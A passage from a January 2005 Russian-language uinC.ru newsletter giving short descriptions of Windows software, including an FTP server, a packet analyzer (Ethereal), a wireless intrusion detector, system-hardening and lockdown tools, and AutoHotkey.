+ отправка HTML сообщений, программа имеет встроенный WYSIWYG HTML редактор;
+ возможность контроля доставки отправленных сообщений;
+ регулировка количества используемых потоков;
+ встроенный менеджер списка рассылки;
+ возможность импорта списка рассылки из CSV файла.
ОС: All Win
Тип программы: Почта

30/01/2005 SilentNight Inspector
Программа позволяет отслеживать изменения в файловой системе относительно заданной папки или на указанном диске. Все изменения заносятся в специальный файл статистики, кроме этого существует возможность звукового оповещения о произошедших изменениях. Отличительная особенность программы от программ такого рода, это возможность выбора фиксируемых типов измений: изменение имени, изменение аттрибутов, изменение размера, удаление/ создание, изменение даты создания/ последнего доступа, изменение уровня безопасности.
ОС: Win 9x/Me/2k/XP
Тип программы: Мониторинг системы

29/01/2005 TYPSoft FTP Server
Небольшой и достаточно быстрый FTP сервер. Программа имеет очень простой наглядный интерфейс. Обладает следующими возможностями:
+ поддержка нескольких пользователей с различными разрешенными папками для доступа;
+ поддержка создания виртуальной файловой структуры;
+ возможность установки ограничений на количество одновременно подключенных пользователей;
+ блокировка или разрешение доступа для заданных IP адресов;
+ ведение как общей статистики обращений к серверу, так и по каждому пользователю в отдельности.
Больше подходит для организации FTP сервера в небольших локальных сетях, но так же подходит и для использования в Интернет.
ОС: All Win
Тип программы: FTP

28/01/2005 STREAM Checker
Небольшая утилита, которая выбирает из Личного Кабинета пользователя МТУ-СТРИМ (а теперь для и Ethernet-тарифов и корпоративных тарифов Точки.Ру) текущие данные по трафику, состоянию счета и отображает их в удобном для пользователя виде как в системном трее, так и в отдельном окне, позволяя прогнозировать и контролировать расход трафика, определять реальный/ идеальный/ оптимальный объем выкачиваемых данных в день/месяц, позволяет контролировать расход средств на личном счету и напоминает о необходимости своевременного пополнения баланса. Для более точной статистики помимо получения данных о предыдущей сессии из Личного Кабинета программа осуществляет мониторинг сессионного трафика, подсчитывая количество пакетов по указанному пользователем сетевому интерфейсу.
Программа умеет работать со всеми известными на данный момент тарифами МТУ-СТРИМ (проверено на тарифах СТАНДАРТ, ТУРБО, ТОРНАДО, ПРОФИ, НЕО, НЕО+), корпоративными тарифами Точки.Ру и Ethernet-тарифами (проверено на тарифе "Митино - 20").
ОС: All Win
Тип программы: Мониторинг сети

27/01/2005 Toolbar Designer
Данная программа позволяет создавать панели инструментов для MS Internet Explorer'а без знания программирования. Процесс создания производится на наглядном уровне, что позволяет сразу же видеть получающийся результат. При создании панели инструментов возможно использование следующих элементов: изображения, редактируемые текстовые поля, выпадающие поля, поля паролей, кнопки, drop&down меню, текст и прочее. Выбранным элементам управления могут быть назначены действия или созданный заранее скрипт. Программа снабжена подробным обучающим видео курсом, который позволит вам быстро овладеть этой средой разработки.
ОС: All Win
Тип программы: Программирование

26/01/2005 BHODemon
Менеджер BHO-модулей, установленных в системе. Программа имеет два режима работы:
1) удаление BHO-модулей, при помощи выбора ненужных BHO из списка;
2) обеспечение мониторинга системы и извещение пользователя о попытке какого-либо веб-сайта установить BHO в систему.
Отличительной особенностью данной программы, от программ подобного рода является постоянно обновляемая база BHO, содержащая подробную информацию о BHO-модулях и степени их опасности для системы.
ОС: All Win
Тип программы: Аудит безопасности

25/01/2005 Ethereal
Многоплатформенный анализатор сетевого трафика, который позволяет в реальном времени сохранять необходимую информацию о трафике в лог, позволяет перехватывать пакеты на любых сетевых интерфейсах и расшифровывать более 518 различных сетевых протоколов. При просмотре лога возможно получить не только общую информацию о трафике, но и детальную вплоть до анализа одного конкретного пакета данных. Ethereal поддерживает работу с файлами статистики созданными tcpdump (libpcap), NAI s Sniffer, Sniffer Pro, NetXray, snoop, Shomiti Surveyor, AIX's iptrace, Microsoft's Network Monitor, Novell's LANalyzer, RADCOM's WAN/LAN Analyzer, HP-UX nettl, ISDN4BSD, Cisco Secure IDS iplog, pppd лог (pppdump-формата) и AG Group s/Wildpacket s Etherpeek. Еще одна особенность Ethereal - это возможность обработки информации получаемой с Lucent/Ascend WAN и Toshiba ISDN маршрутизаторов. Файлы с информацией о трафике могут быть запакованы с использованием gzip, при обращении к ним для просмотра Ethereal распаковывает их "на лету".
ОС: Cross-platform
Тип программы: Мониторинг сети

24/01/2005 AirSnare
Система обнаружения сетевых атак, предназначенная для мониторига беспроводных сетей. Программа может оповещать несколькими способами о появлении в сети неизвестного MAC-адреса, такими как отправка сообщения на заданный адрес электронной почты, обычным сообщением программы, записью в лог, посылкой сообщения на присоединенный адрес, информируя о том, что действия данного адреса находятся под наблюдением. Для увеличения функциональных возможностей AirSnare предусмотрена интеграция с программой Ethereal.
ОС: Win 9x/Me/2k/XP
Тип программы: Беспроводные сети

23/01/2005 Harden-It
Утилита для установки или укрепления защиты системы/сети от различных сетевых атак. Основные возможности программы:
+ защита TCP и IP стека (Netbios, ICMP, SYN, SYN-ACK..);
+ улучшение настроек безопасности системы;
+ блокирование неиспользуемых сервисов и ActiveX скриптов;
+ защита от DoS(Denial of Service) атаки и некоторых других сетевых атак;
+ активация защиты от SYN flood при обнаружении атаки;
+ установка пользовательских параметров для улучшения процесса обнаружения атак;
+ наличие постоянно обнавляемой базы обнаружения и противодействия другим сетевым атакам.
Авторы программы рекомендуют использовать данную программу только пользователям, обладающим достаточными знаниями сетевых технологий.
ОС: Win NT/2k/XP
Тип программы: Сетевые утилиты

22/01/2005 AutoHotkey
Программа, представляет собой небольшой комплекс программ для автоматизации выполнения однотипных действий, связанных с нажатием одних и тех же клавиш, в том числе и комбинаций "горячих" клавиш, перемещение курсора мыши в заданную позицию, эмулирование нажатий кнопок мыши, запуском программ и открытием документов, работой с буфером обмена, реестром, управлением параметрами воспроизведения музыки. Данный программный комплекс включает обработчик специального скриптового языка, конвертор файла скрипта в ЕХЕ-файл и ряд других вспомогательных утилит, в том числе утилит для облегчения создания самого скрипта. Программа содержит подробную документацию по используемому языку скриптов.
ОС: All Win
Тип программы: Программирование

21/01/2005 Duplicate File Finder
Программа для быстрого поиска дубликатов файлов в заданном каталоге или на заданном диске. Сравнение файлов происходит при помощи анализа их CRC контрольных сумм. Благодаря использованию при поиске нескольких потоков, программа обладает довольно высокой скоростью работы.
ОС: All Win
Тип программы: Файловые утилиты

18/01/2005 Security guard
Программа, предназначенная для изменения уровня безопасности вашего компьютера путем запрещения или блокирования некоторых функций, использование которых может быть опасно. Основные возможности и особенности программы:
+ запрет запуска любых программ (два режима запрета);
+ запрет использования встроенного мастера записи компакт дисков;
+ запрет скачивания файлов из Интернет;
+ запрет запуска редактора реестра;
+ запрет вызова диспетчера задач;
+ запрет использования пункта "Выполнить" в меню Пуск;
+ запрет свойства Панели задач и меню Пуск;
+ запрет изменения свойств Экрана;
+ запрет запуска Панели управления и ее апплетов;
+ скрытие/блокировка меню "Пуск" Рабочего стола;
+ запрет контекстного меню "Проводника" и "Мой компьютер";
+ запрет использования клавиши "Windows";
+ запрет доступа к любым дискам, даже не установленным в системе, а динамически подключаемым (флеш, HDDusb и т.д.);
+ возможность сохранения запретов даже при работе компьютера в "безопасном" режиме;
+ вход в программу только по паролю, который Вы устанавливаете и меняете в любое время;
+ маленький размер дистрибутива;
+ не требует постоянного запуска, и нахождения в автозапуске, все настройки могут быть сделаны с внешнего носителя.
ОС: Win 2k/XP
Тип программы: Системные утилиты

Архив рассылки новостей:
http://www.uinc.ru/news/archive/

Всем удачи.
uinC Team
http://www.uinc.ru

P.S. Все предложения, замечания и просьбы оставлять здесь:
http://www.uinc.ru/news/sendnews.php

Любые материалы с нашего сайта или рассылки не могут быть скопированы без разрешения автора или администрации сервера uinC.ru